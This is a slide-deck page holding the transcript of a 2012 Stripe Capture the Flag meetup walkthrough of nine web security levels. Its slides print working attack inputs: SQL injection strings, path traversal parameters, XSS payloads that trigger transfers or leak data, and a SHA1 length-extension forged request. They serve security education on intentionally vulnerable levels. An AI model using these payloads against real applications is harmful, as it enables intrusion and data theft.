$30 off During Our Annual Pro Sale. View Details »

Stripe Capture the Flag 2.0 Meetup

Andy Brody
August 30, 2012
Technology
7
2.5k

Stripe Capture the Flag 2.0 Meetup

These slides were part of a talk and walkthrough that was given at the Stripe Capture the Flag Meetup on August 30th.

https://stripe.com/blog/capture-the-flag-20-meetup

Andy Brody

August 30, 2012
Tweet

More Decks by Andy Brody

See All by Andy Brody
Stripe Capture the Flag Meetup
ab
4
3.1k

Other Decks in Technology

See All in Technology
Parsing case study in Go / Go Conference mini 2023 Winter IN KYOTO
k1low
2
170
AI・機械学習ライブラリを使ったWebアプリでワクワク体験! / Qiita Night~AI、機械学習 / 20231201
you
PRO
1
1.2k
朝起こしてくれるメイドさんが欲しい (LT) - NIFTY Tech Day 2023
niftycorp
1
110
大規模Webアプリケーションプラットフォームを開発して軌道に乗るまでにやったこと / How to Put Platforms on Track
hhiroshell
0
340
Kaggle Tokyo Meetup2023 CommonLit Solutionの紹介と考え方 - Fulltrain戦略と(Seed/Model)Ensembleの可視化 -
chumajin
2
1.1k
⾃律的な開発チームを⽀えるためのSLO運⽤
sansantech
PRO
5
880
継続的なコツコツ技術広報とブランディング磨き込みの過程と課題/engineering-brand
nishiuma
0
110
AWS re:Invent 2023に参加してきた ~Amazon Inspectorのアップデートを添えて~ / AWS re:Invent 2023 Participation Bulletin with Amazon Inspector Updates
yuj1osm
0
200
開発生産性の多角的接点〜1,000名のクリエイター組織 × 開発生産性〜 / Multifaceted touchpoints of development productivity
i35_267
3
510
APIテスト導入から2年。アジャイルな組織で見えてきたmabl活用の道
bengo4com
0
1.9k
つくばチャレンジ2023EX with PLATEAU@つくばセンター広場課題コース
tsukubachallenge
0
680
Micro Frontends for Java Microservices - SF JUG 2023
mraible
PRO
1
210

Featured

See All Featured
Three Pipe Problems
jasonvnalue
89
9.3k
Pencils Down: Stop Designing & Start Developing
hursman
115
11k
Imperfection Machines: The Place of Print at Facebook
scottboms
257
12k
What the flash - Photography Introduction
edds
64
11k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
1
1.1k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
GitHub's CSS Performance
jonrohan
1021
440k
Why Our Code Smells
bkeepers
PRO
329
56k
Build The Right Thing And Hit Your Dates
maggiecrowley
23
1.7k
Unsuck your backbone
ammeep
660
56k
[RailsConf 2023] Rails as a piece of cake
palkan
17
3.2k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
152
14k

Transcript

  1. Greg Brockman (@thegdb)
    Andy Brody (@alberge)
    Siddarth Chandrasekaran (@sidd)
    Ludwig Pettersson (@luddep)

    View Slide

  2. Why CTF?
    • Hands-on security education
    • Try out the exploits you only read about
    • Fun (for you and for us)!

    View Slide

  3. View Slide

  4. View Slide

  5. Level stats

    View Slide

  6. Since last time...
    • 100% higher version number! (2.0)
    • 50% more levels! 999% more web!
    • 16,061 accounts created!
    • > 800% more servers!
    • 100% more IP addresses! (40,818)
    • 0% as many fork bombs!

    View Slide

  7. CTF Infrastructure
    • Isolation per user
    • Chroot, Apache, mod_fcgid, suexec, puppet,
    space-commander
    • https://blog.gregbrockman.com/2012/08/
    system-design-stripe-capture-the-flag/

    View Slide

  8. Things that went wrong

    View Slide

  9. Level 0: Secret Safe

    View Slide

  10. Level 0: Secret Safe

    View Slide

  11. Level 0: Secret Safe
    injected query:
    SELECT * FROM secrets WHERE key LIKE ‘%.%’

    View Slide

  12. Level 1: Guessing Game

    View Slide

  13. Level 1: Guessing Game

    View Slide

  14. Level 1: Guessing Game
    solutions:
    ?attempt=&filename=
    ?attempt=&filename=/dev/null
    ?attempt=...&filename=../index.php

    View Slide

  15. Level 2: Social Network

    View Slide

  16. Level 2: Social Network

    View Slide

  17. Level 3: Secret Vault

    View Slide

  18. Level 3: Secret Vault

    View Slide

  19. Level 3: Secret Vault
    username:
    x' UNION ALL SELECT 3, '9b237c...', 'llama
    password:
    llama

    View Slide

  20. Level 3: Secret Vault
    injected query:
    SELECT id, password_hash, salt FROM users
    WHERE username = 'x' UNION ALL
    SELECT 3, '9b237c...', 'llama' LIMIT 1

    View Slide

  21. Level 4: Karma Trader

    View Slide

  22. Level 4: Karma Trader
    unless username =~ /^\w+$/
    die("Invalid username. Usernames must
    match /^\w+$/", :register)
    end
    <% if @trusts_me.include?(user[:username]) %>

    <%= user[:username] %>
    (password: <%= user[:password] %>,
    last active <%= last_active %>)

    1.
    2.

    View Slide

  23. Level 4: Karma Trader
    password:
    <br/>jQuery.ajax({<br/>type: 'POST',<br/>url: './transfer',<br/>data: {to: '$user', amount: 1}<br/>})<br/>

    View Slide

  24. Level 5:
    DomainAuthenticator

    View Slide

  25. Level 5:
    DomainAuthenticator

    View Slide

  26. Level 5:
    DomainAuthenticator
    begin
    body = perform_authenticate(pingback,
    username, password)
    rescue StandardError => e
    return "An unknown error occurred while
    requesting #{pingback}: #{e}"
    end

    View Slide

  27. Level 5:
    DomainAuthenticator
    def authenticated?(body)
    body =~ /[^\w]AUTHENTICATED[^\w]*$/
    end

    View Slide

  28. Level 6: Streamer

    View Slide

  29. Level 6: Streamer
    <br/>var username = "<%= @username %>";<br/>var post_data = <%= @posts.to_json %>;<br/>...<br/>

    View Slide

  30. Level 6: Streamer

    <br/>$.get(window.location + /user_info/.source,<br/>function(d) {<br/>$(/#content/.source).<br/>val(escape(d));<br/>document.forms[0].submit()<br/>})<br/>

    View Slide

  31. Level 7: WaffleCopter

    View Slide

  32. Level 7: WaffleCopter

    View Slide

  33. Looks Secure
    • Parameterized queries — no SQL injection
    • Automatic template escaping — no XSS
    • Session cookies encrypted w/ random key
    • Tracebacks are disabled
    • API requests are signed with secret token

    View Slide

  34. Something’s Fishy...
    @app.route(’/logs/’)
    @require_authentication
    def logs(id):
    rows = get_logs(id)
    return render_template(‘logs.html’,
    logs=rows)

    View Slide

  35. /logs/1

    View Slide

  36. Replay attack?

    View Slide

  37. Signature algorithm
    def verify_signature(user_id, sig, raw_params):
    h = hashlib.sha1()
    h.update(secret + raw_params)
    if h.hexdigest() != sig:
    raise BadSignature(‘sig mismatch’)
    return True

    View Slide

  38. Signature algorithm
    SHA1(SECRET||MESSAGE) => SIGNATURE
    POST /orders
    MESSAGE|sig:SIGNATURE

    View Slide

  39. Length extension attack

    View Slide

  40. Length extension attack
    SHA1(SECRET||MESSAGE) => SIGNATURE
    SHA1+SIGNATURE(MESSAGE||PAD||ATTACK)
    => NEWSIG
    SHA1(SECRET||MESSAGE||PAD||ATTACK)
    => NEWSIG
    POST /v1/orders
    MESSAGEPADATTACK|sig:NEWSIG

    View Slide

  41. Exploit
    POST /orders
    ORIG_MESSAGE\x80\0\0\0\0\0\0\0\...
    \x028&waffle=liege|sig:57c43df7...
    {“success”:true,
    “confirm_code”: “PVzbPnTDCY”,
    “message”: “Great news, 2 liege
    waffles will soon be flying your
    way!”}

    View Slide

  42. USE HMAC
    http://en.wikipedia.org/wiki/HMAC
    HMAC-SHA1 (simplified):
    SHA1(SECRET||MESSAGE) => HASH
    SHA1(HASH||SECRET) => SIGNATURE

    View Slide

  43. ANY QUESTIONS?
    http://netifera.com/research/
    flickr_api_signature_forgery.pdf
    I will use HMAC if I want a signature.
    I will use HMAC if I want a signature.
    I will use HMAC if I want a signature.
    I will use HMAC if I want a signature.
    I will use HMAC if I want a signature.

    View Slide

  44. Level 8: PasswordDB
    $ curl localhost:3000 -d '{"password": "123123123123",
    "webhooks": []}'
    {"success": false}

    View Slide

  45. Level 8: PasswordDB
    912 513 525 204
    123123123123 Webhook
    (1)
    (2)
    (3)

    View Slide

  46. Level 8: PasswordDB
    [127.0.0.1:52493:1] Received payload
    ...
    [127.0.0.1:52495:2] Received payload
    ...
    [127.0.0.1:52497:3] Received payload

    View Slide

  47. Level 8: PasswordDB
    • Insight: look at port deltas!
    • Why does this work? http://
    aleccolocco.blogspot.com/2008/11/
    ephemeral-ports-problem-and-
    solution.html

    View Slide

  48. Future events
    • Get notified: http://meetup.com/Stripe/
    • Alternatively, https://stripe.com/jobs
    Feel free to get in touch at
    [email protected]

    View Slide